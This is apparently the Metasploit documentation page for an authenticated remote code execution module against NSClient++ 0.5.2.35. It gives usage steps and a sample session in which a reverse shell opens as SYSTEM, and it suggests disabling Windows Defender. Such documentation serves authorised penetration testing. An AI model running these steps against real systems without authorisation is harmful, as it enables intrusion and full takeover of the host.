## Vulnerable Application

### Description

This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privileged reverse shell.
For this module to work, both web interface of NSClient++ and `ExternalScripts` feature should be enabled.

### Installation

A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with
this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface
and the `ExternalScripts` feature to allow the exploit to work.

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/windows/http/nscp_authenticated_rce`
3. `set RHOST <target_host>`
4. `set PASSWORD <admin_password>` to set the admin password of NSClient++ web interface
5. `check` to check if the targeted NSClient++ is vulnerable
6. `set payload <choose_a_payload>` to set a specific payload to send
7. `run` the module to exploit the vulnerability and start a shell

## Options

### PASSWORD

Set the PASSWORD of the admin account of NSClient++.

## Scenarios

This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted).
See the following output :

```
msf6 > use nscp_authenticated_rce
[*] Using configured payload windows/x64/shell_reverse_tcp
msf6 exploit(nscp_authenticated_rce) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf6 exploit(nscp_authenticated_rce) > set password easypassword
password => easypassword
msf6 exploit(nscp_authenticated_rce) > exploit

[*] Started reverse TCP handler on y.y.y.y:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[+] The target is vulnerable. External scripts feature enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: zqlmwevxef)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Command shell session 21750 opened (y.y.y.y:4444 -> x.x.x.x:51026) at 2021-06-08 16:54:39 +0200

C:\Program Files\NSClient++>whoami
whoami
nt authority\system
```